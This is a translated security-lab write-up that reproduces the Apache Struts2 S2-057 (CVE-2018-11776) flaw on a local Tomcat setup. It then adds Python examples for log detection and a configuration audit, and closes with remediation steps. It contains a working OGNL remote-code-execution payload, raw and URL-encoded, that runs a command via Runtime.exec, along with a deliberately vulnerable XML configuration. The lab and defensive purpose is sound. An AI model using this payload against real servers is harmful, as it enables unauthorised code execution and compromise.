Struts2-057: From Environment Setup to Reproduction

Published: 2018-08-30 10:11:12 Source: 合天网安实验室

Vulnerability Overview:

Vulnerability Description:

On August 23, 2018, Apache Struts published its latest security bulletin: Apache Struts2 contains a high-severity remote code execution vulnerability, reported by a security researcher on the Semmle Security Research team and assigned CVE-2018-11776 (S2-057). Struts2 can allow remote code execution when the namespace value is not set in the XML configuration and the action configuration likewise has no namespace or uses a wildcard namespace.


Affected Versions:

Struts 2.3 to 2.3.34 and Struts 2.5 to 2.5.16


CVE ID:

CVE-2018-11776


Reproduction:

Environment:

Operating system: Windows 10

Tomcat version: Apache Tomcat/7.0.88


Environment Setup:

Before installing Struts, first install a JDK on your machine and configure the environment variables; I won't go into the details here since everyone knows how to do this. Then extract the Tomcat archive.




After that, download Struts 2.3.34 and copy struts2-showcase.war from the archive into Tomcat's webapps directory so that it is deployed automatically.

Struts 2.3.34 download: http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip

Once the WAR file is in place, run startup.bat in Tomcat's bin directory to start Tomcat and deploy struts2. When deployment has finished, open http://127.0.0.1:8080/struts2-showcase in a browser to confirm it succeeded.




A normally deployed Struts showcase looks as shown above. To reproduce Struts2-057, however, we need a redirect that satisfies the vulnerable condition, so we modify the default action configuration to set up that redirect logic, which makes the reproduction straightforward.

Two files need to be modified:

1. D:\tomcat\webapps\struts2-showcase\WEB-INF\src\java\struts-actionchaining.xml

2. D:\tomcat\webapps\struts2-showcase\WEB-INF\classes\struts-actionchaining.xml

Comment out the original contents of the XML file and replace them with the following:




The configuration is as follows:


<code>
<struts>
    <package name="actionchaining" extends="struts-default">
        <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
            <result type="redirectAction">
                <param name="actionName">register2</param>
            </result>
        </action>
        <action name="actionChain2" class="org.apache.struts2.showcase.actionchaining.ActionChain2">
            <result type="chain">actionChain3</result>
        </action>
        <action name="actionChain3" class="org.apache.struts2.showcase.actionchaining.ActionChain3">
            <result>/WEB-INF/actionchaining/actionChainingResult.jsp</result>
        </action>
    </package>
</struts>
</code>

Save the changes and restart the Tomcat service.


Vulnerability Test:

With all the required environment configured, we now test the Struts2-057 vulnerability.


First we construct the payload:

http://127.0.0.1:8080/struts2-showcase/${(222+333)}/actionChain1.action

After the request executes, we find it has redirected to:

http://127.0.0.1:8080/struts2-showcase/555/register2.action

222+333 was evaluated to 555 during the redirect, which shows that the expression was evaluated as OGNL and confirms the vulnerability. Next we test by invoking the local calculator.


The payload is as follows:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#cmd=@java.lang.Runtime@getRuntime().exec("calc"))}

Before executing it, we URL-encode it and obtain:


%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d
					

Append it to the URL as follows for testing:


http://127.0.0.1:8080/struts2-showcase/%24%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%63%6d%64%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%29%7d/actionChain1.action

The local calculator is launched successfully.
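From the defender's side, the distinctive trace of this technique is an OGNL expression sitting in the namespace portion of the request path, immediately before the .action target, exactly as in the two requests above. The following Python is an added example (not part of the original write-up) that scans Tomcat access-log lines for that pattern; the log lines are constructed, and it decodes repeatedly so that double-URL-encoded variants are normalised before matching.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat access-log lines (Common Log Format). The first two carry
# the arithmetic probe from the write-up, raw and double-URL-encoded; the third
# is an ordinary request to the same action.
SAMPLE_LOG = [
    '127.0.0.1 - - [30/Aug/2018:10:11:12 +0800] "GET /struts2-showcase/${(222+333)}/actionChain1.action HTTP/1.1" 302 -',
    '10.0.0.5 - - [30/Aug/2018:10:11:13 +0800] "GET /struts2-showcase/%2524%257b%2528222%252b333%2529%257d/actionChain1.action HTTP/1.1" 302 -',
    '10.0.0.9 - - [30/Aug/2018:10:11:14 +0800] "GET /struts2-showcase/actionchaining/actionChain1.action HTTP/1.1" 200 -',
]

REQUEST_RE = re.compile(r'^(\S+) .*"(?:GET|POST|HEAD) (\S+) HTTP/')
# An OGNL expression in the URL starts with ${ or %{ ; both forms are checked
# after decoding.
OGNL_MARKER_RE = re.compile(r'[$%]\{')


def decode_path(path, rounds=3):
    """URL-decode until the value is stable so double-encoded paths normalise."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def flag_s2_057(lines):
    """Return (client_ip, decoded_path) for .action requests whose namespace
    part of the path (everything before the final slash) carries an OGNL marker."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, raw_path = m.group(1), m.group(2).split("?", 1)[0]
        path = decode_path(raw_path)
        namespace, _, target = path.rpartition("/")
        if target.endswith(".action") and OGNL_MARKER_RE.search(namespace):
            hits.append((client, path))
    return hits
```

The same check applies to any web-server or WAF log that records the raw request path; a 302 to a numeric namespace such as /555/ in the response is the corroborating signal shown earlier.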




Remediation:

1. Upgrade to Struts 2.3.35 or Struts 2.5.17 or a later version.

2. Verify that a namespace (where applicable) is set, and is never forgotten, for every result defined in the underlying configuration. Also verify that a value or action is set, and never forgotten, on every url tag in your JSPs. Both are required only when the enclosing action configuration has no namespace or uses a wildcard namespace.
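The configuration change made earlier (a redirectAction result with no namespace, inside a package with no namespace) is exactly the condition that remediation point 2 tells you to audit. The following Python is an added example, not code from the write-up or from the Struts project, that checks a struts.xml for redirectAction and chain results whose namespace could be taken from the request URL; the embedded vulnerable sample mirrors the write-up's configuration, and the hardened variant uses a hypothetical /actionchaining namespace.

```python
import xml.etree.ElementTree as ET

# Constructed sample mirroring the write-up's struts-actionchaining.xml: the
# package has no namespace and the redirectAction result does not set one.
VULNERABLE_XML = """<struts>
  <package name="actionchaining" extends="struts-default">
    <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
      </result>
    </action>
    <action name="actionChain3" class="org.apache.struts2.showcase.actionchaining.ActionChain3">
      <result>/WEB-INF/actionchaining/actionChainingResult.jsp</result>
    </action>
  </package>
</struts>"""

# Hardened variant (the /actionchaining namespace is a hypothetical value):
# the package declares a namespace and the redirect pins its own.
HARDENED_XML = """<struts>
  <package name="actionchaining" namespace="/actionchaining" extends="struts-default">
    <action name="actionChain1" class="org.apache.struts2.showcase.actionchaining.ActionChain1">
      <result type="redirectAction">
        <param name="actionName">register2</param>
        <param name="namespace">/actionchaining</param>
      </result>
    </action>
  </package>
</struts>"""

def find_unsafe_results(xml_text):
    """Return (package, action, result type) for redirectAction/chain results
    whose namespace could fall back to the request URL (the S2-057 condition)."""
    findings = []
    for pkg in ET.fromstring(xml_text).iter("package"):
        pkg_ns = pkg.get("namespace")
        # A missing or wildcard package namespace lets the URL supply it.
        pkg_unsafe = pkg_ns is None or "*" in pkg_ns
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type")
                if rtype not in ("redirectAction", "chain"):
                    continue
                has_ns = any(p.get("name") == "namespace" and (p.text or "").strip()
                             for p in result.findall("param"))
                if pkg_unsafe and not has_ns:
                    findings.append((pkg.get("name"), action.get("name"), rtype))
    return findings
```

Run it over every struts*.xml under WEB-INF/classes; an empty result list for each file means point 2 is satisfied, but upgrading per point 1 is still the actual fix.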

